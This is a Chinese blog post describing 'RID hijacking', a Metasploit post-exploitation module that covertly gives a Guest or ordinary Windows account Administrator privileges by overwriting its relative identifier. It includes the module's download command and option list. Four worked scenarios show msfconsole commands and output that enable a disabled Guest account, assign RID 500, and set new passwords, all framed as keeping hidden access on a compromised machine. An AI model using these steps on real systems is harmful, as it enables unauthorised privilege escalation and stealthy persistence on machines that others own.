RID劫持:维护Windows机器上的访问权限
首页 > 安全    作者:stranger   2018年10月10日 14:56 星期三   热度:505°   百度已收录  
时间:2018-10-10 14:56   热度:505° 

适用于所有Windows版本的RID Hijacking挂钩允许通过修改用户的某些安全属性以隐蔽方式为现有帐户设置所需权限。
通过仅使用OS资源,可以在创建访问令牌之前替换用户的RID。为了使攻击自动化,开发了Metasploit模块。它需要针对受害者的米预备会话。
概观
此模块将通过修改现有帐户的某些属性在目标上创建条目。它将通过设置相对标识符(RID)来更改帐户属性,该标识符应由目标计算机上的一个现有帐户拥有。
利用某些Windows本地用户管理完整性问题,此模块将允许使用一个已知帐户凭据(如GUEST帐户)进行身份验证,并使用其他现有帐户(如ADMINISTRATOR帐户)的权限进行身份验证,即使已禁用欺骗帐户。
通过对Windows主机使用meterpreter会话,模块将尝试在需要时获取SYSTEM权限,并将修改某些属性以劫持现有本地帐户的权限并将其设置为另一个。
易受攻击的软件
该模块已经过测试:
Windows XP,2003。(32位)
Windows 8.1专业版。 (64位)
Windows 10.(64位)
Windows Server 2012.(64位)
此模块未经过测试,但可能适用于:
其他版本的Windows(x86和x64)。
下载
git clone https://github.com/r4wd3r/RID-Hijacking.git
使用
选项
GETSYSTEM:尝试获得受害者的SYSTEM权限。默认值:false
GUEST_ACCOUNT:使用GUEST内置帐户作为要劫持的权限的目标。将此帐户设为劫持者。默认值:false。
SESSION:运行此模块的会话。默认值:无。
USERNAME:设置受害主机的用户帐户(SAM帐户名称),该主机将成为要被劫持的权限的目标。将此帐户设为劫持者。如果GUEST_ACCOUNT选项设置为true,则在定义时将忽略此参数。默认值:无。
密码:设置或更改被定义为要被劫持的权限的目标的帐户的密码,GUEST帐户或USERNAME选项中设置的用户帐户。将密码设置为劫持者帐户。默认值:无。
RID:指定受害者帐户的十进制RID号。此号码应该是目标主机上现有帐户的RID,无论它是否被禁用(即:管理员内置帐户的RID为500)。设置将被劫持的帐户所拥有的RID。默认值:500
方案
为Guest内置帐户分配管理员权限。
msf post(rid_hijack) > set GETSYSTEM true
GETSYSTEM => true
msf post(rid_hijack) > set GUEST_ACCOUNT true
GUEST_ACCOUNT => true
msf post(rid_hijack) > set SESSION 1
SESSION => 1
msf post(rid_hijack) > run

[*] Checking for SYSTEM privileges on session
[+] Session is already running with SYSTEM privileges
[*] Target OS: Windows 8.1 (Build 9600).
[*] Target account: Guest Account
[*] Target account username: Invitado
[*] Target account RID: 501
[*] Account is disabled, activating...
[+] Target account enabled
[*] Overwriting RID
[+] The RID 500 is set to the account Invitado with original RID 501
[*] Post module execution completed
以Guest帐户登录后的结果。

Guest
将管理员权限分配给本地自定义帐户。
msf post(rid_hijack) > set GETSYSTEM true
GETSYSTEM => true
msf post(rid_hijack) > set GUEST_ACCOUNT false
GUEST_ACCOUNT => false
msf post(rid_hijack) > set USERNAME testuser
USERNAME => testuser
msf post(rid_hijack) > run

[*] Checking for SYSTEM privileges on session
[+] Session is already running with SYSTEM privileges
[*] Target OS: Windows 8.1 (Build 9600).
[*] Checking users...
[+] Found testuser account!
[*] Target account username: testuser
[*] Target account RID: 1002
[+] Target account is already enabled
[*] Overwriting RID
[+] The RID 500 is set to the account testuser with original RID 1002
[*] Post module execution completed
以testuser帐户登录后的结果。

testuser
为Guest内置帐户分配自定义权限并为Guest设置新密码。
msf post(rid_hijack) > set GUEST_ACCOUNT true
GUEST_ACCOUNT => true
msf post(rid_hijack) > set RID 1002
RID => 1002
msf post(rid_hijack) > set PASSWORD Password.1
PASSWORD => Password.1
msf post(rid_hijack) > run

[*] Checking for SYSTEM privileges on session
[+] Session is already running with SYSTEM privileges
[*] Target OS: Windows 8.1 (Build 9600).
[*] Target account: Guest Account
[*] Target account username: Invitado
[*] Target account RID: 501
[+] Target account is already enabled
[*] Overwriting RID
[+] The RID 1002 is set to the account Invitado with original RID 501
[*] Setting Invitado password to Password.1
[*] Post module execution completed
为自定义帐户分配自定义权限并为自定义帐户设置新密码。
msf post(rid_hijack) > set GUEST_ACCOUNT false
GUEST_ACCOUNT => false
msf post(rid_hijack) > set USERNAME testuser
USERNAME => testuser
msf post(rid_hijack) > set PASSWORD Password.2
PASSWORD => Password.2
msf post(rid_hijack) > run

[*] Checking for SYSTEM privileges on session
[+] Session is already running with SYSTEM privileges
[*] Target OS: Windows 8.1 (Build 9600).
[*] Checking users...
[+] Found testuser account!
[*] Target account username: testuser
[*] Target account RID: 1002
[+] Target account is already enabled
[*] Overwriting RID
[+] The RID 1002 is set to the account testuser with original RID 1002
[*] Setting testuser password to Password.2
[*] Post module execution completed

二维码加载中...
本文作者:stranger      文章标题: RID劫持:维护Windows机器上的访问权限
本文地址:http://biocyborg.cn/RIDhijack
版权声明:若无注明,本文皆为“biocyborg博客”原创,转载请保留文章出处。
正文到此结束



版权所有:biocyborg博客     ICP备案号:冀ICP备18028496号    本站在危难中运行: